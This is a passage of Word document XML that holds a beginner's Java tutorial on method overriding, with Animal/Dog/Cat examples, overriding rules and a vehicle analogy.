          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where a subclass provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific implementation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a method that is already defined in its superclass. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (name, return type, and parameters) in the subclass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>must be identical</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the one in the superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D5BCAC" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB3D686" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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verriding happens at </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (dynamic polymorphism).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30398376" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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allows a subclass to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>redefine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the behavior of a method inherited from the superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297502DC" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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verride</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation is used to indicate method overriding explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB8638" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004B1A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00039AC">
          <v:rect id="_x0000_i1347" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458D315" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">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yntax for Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA6A412"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the subclass, you define a method with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same signature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the superclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F11F67"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Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E9C97"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display() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA3574"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Parent's display method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4192DC"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0ABD52B"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B1DA4E4" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4BA99A"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Child extends Parent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B64CA3"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4CA7054C"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display() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8306A8"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hild's overridden display method");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A330E6"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697C789"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7CEC6C2" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004B1A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B14D3B">
          <v:rect id="_x0000_i1348" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ABE137" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">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Method Overriding in Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EB9B34"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ADD16A"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sound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247B0D8"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Animal makes a sound");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63580012"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20795D2"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80B669E" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286C8042"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65813B0B"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29C2F162"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sound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B31505"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Dog barks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3A212F"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417BCAD"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DADFFF4" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77411BF0"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Cat extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9C066"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17B6C66C"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sound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6EE01"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at meows");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B45953A"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77A8506"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24DFE71" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0526DE91"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3F3505EB"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7030DD67"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nimal myAnimal = new Animal();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAAAF8E"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nimal myDog = new Dog();  // Parent reference, Child object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381DAD3C"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nimal myCat = new Cat();  // Parent reference, Child object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658B97AF" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3746F9F4"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Animal.sound();  // Output: Animal makes a sound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EFD644"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Dog.sound();     // Output: Dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FBB343"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Cat.sound();     // Output: Cat meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18F2E5"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A2B2810"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ACC4BB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13040863" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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og</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Cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> both override the sound() method of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Animal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC27843" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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t </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the JVM decides which sound() method to call based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actual object type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Dog or Cat).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C61F4" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004B1A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3ECB0CB">
          <v:rect id="_x0000_i1349" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0396AFA7" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">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Important Rules for Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD3D42" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ame method signature:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The method name, return type, and parameters must be identical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3083F188" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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 Modifier:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The access modifier of the overriding method in the subclass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cannot be more restrictive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than the method in the superclass (e.g., if the superclass method is public, the subclass method must be public as well).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D5BF1A" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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turn Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The return type of the overriding method in the subclass must be the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same</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covariant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (i.e., a subclass of the original return type).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33113A56" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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nal methods can't be overridden:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a method is declared as final, it can't be overridden in the subclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F7D2AE" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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methods can't be overridden:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Static methods are bound at compile time, so they can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>redeclared</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but not overridden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5A2417" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="004B1A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A4725DA">
          <v:rect id="_x0000_i1350" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0927801E" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">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eal-World Analogy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AB8BE" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF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ink of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vehicle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent clas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car</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bike</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as subclasses. Both have a method start(), but the behavior of start() is different for each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E338E" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ehicle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: General method — start() might just say, "Starting vehicle."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654CA2F4" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ar</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Overrides the start() method — "Starting car with ignition."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481458B6" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ike</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Overrides the start() method — "Starting bike with kick."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9C1170" w14:textId="77777777" w:rsidR="00DE0966" w:rsidRPr="00CE4B95" w:rsidRDefault="00DE0966" w:rsidP="004B1AF9">
      <w:pPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Even though each vehicle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inherits</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the start() method, each subclass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overrides</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> it to suit its own behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44572720" w14:textId="7FC4032C" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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13AD7090">
          <v:rect id="_x0000_i1351" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="348D4359" w14:textId="77777777" w:rsidR="00D66479" w:rsidRPr="00CE4B95" w:rsidRDefault="00D66479">
      <w:pPr>
